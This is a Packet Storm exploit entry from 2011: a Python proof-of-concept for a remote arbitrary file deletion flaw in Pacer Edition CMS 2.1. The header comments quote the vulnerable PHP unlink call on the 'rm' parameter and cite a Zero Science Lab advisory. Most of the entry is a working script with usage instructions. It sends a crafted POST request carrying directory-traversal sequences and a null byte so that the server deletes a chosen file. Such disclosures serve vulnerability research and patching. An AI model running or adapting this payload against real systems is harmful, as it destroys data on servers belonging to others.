Pacer Edition CMS 2.1 Arbitrary File Deletion

2011-06-09T00:00:00
ID PACKETSTORM:102136
Type packetstorm
Reporter LiquidWorm
Modified 2011-06-09T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
#  
# Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit  
#  
#  
# Vendor: The Pacer Edition  
# Product web page: http://www.thepaceredition.com  
# Affected version: RC 2.1 (SVN: 867)  
#  
# Summary: The 'Pacer Edition' is a Content Management System(CMS)  
# written using PHP 5.2.9 as a minimum requirement. The Pacer Edition  
# CMS was based from Website baker core and has been completely  
# redesigned with a whole new look and feel along with many new  
# advanced features to allow you to build sites exactly how you want  
# and make them, 100% yours!  
#  
# Desc: Input passed to the 'rm' parameter in modules/code/syntax_check.php  
# is not properly sanitised before being used to delete files. This can  
# be exploited to delete files with the permissions of the web server via  
# directory traversal sequences passed within the 'rm' parameter.  
#  
#  
# /modules/code/syntax_check.php (line: 99-102):  
# ----------------------------------------------------------  
#  
# if (isset($_REQUEST['rm'])) {  
# @unlink($_REQUEST['rm']);  
# die();  
# }  
#  
# ----------------------------------------------------------  
#  
#  
# Tested on: Microsoft Windows XP Professional SP3 (EN)  
# Apache 2.2.14 (Win32)  
# PHP 5.3.1  
# MySQL 5.1.41  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# liquidworm gmail com  
# Zero Science Lab  
#  
#  
# Advisory ID: ZSL-2011-5017  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5017.php  
#  
#  
#  
# 07.06.2011  
#  
  
  
import socket  
import sys  
  
print '\n-------------------------------------------------------------------'  
print '\n Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit'  
print '\n-------------------------------------------------------------------\n'  
  
if len(sys.argv) < 4:  
print '\nUsage: ' + sys.argv[0] + ' <target> <port> <file>\n'  
print 'Example: ' + sys.argv[0] + ' 192.168.16.101 80 naked.jpg\n'  
sys.exit(0)  
  
host = sys.argv[1]  
port = int(sys.argv[2])  
file = sys.argv[3]  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect = s.connect((host, port))  
s.settimeout(10)  
answ = s.recv(1024)  
  
s.send('POST /modules/code/syntax_check.php?rm=..%2f..%2f..%2f..%2f..%2f..%2f' + file + '%00 HTTP/1.1\r\n'  
'Host: ' + host + '\r\n'  
'Connection: keep-alive\r\n'  
'Content-Length: 0\r\n'  
'Cache-Control: max-age=0\r\n'  
'Origin: null\r\n'  
'User-Agent: thricer\r\n'  
'Content-Type: multipart/form-data; boundary=----x\r\n'  
'Accept: text/html\r\n'  
'Accept-Language: en-US,en;q=0.8\r\n'  
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'  
'\r\n\r\n')  
  
htcode = 'HTTP/1.1 200'  
  
if htcode not in answ[:len(htcode)]:  
print '- Error deleting file!\n'  
sys.exit(0)  
else: print '+ File ' + file + 'deleted!\n'  
  
s.close  
`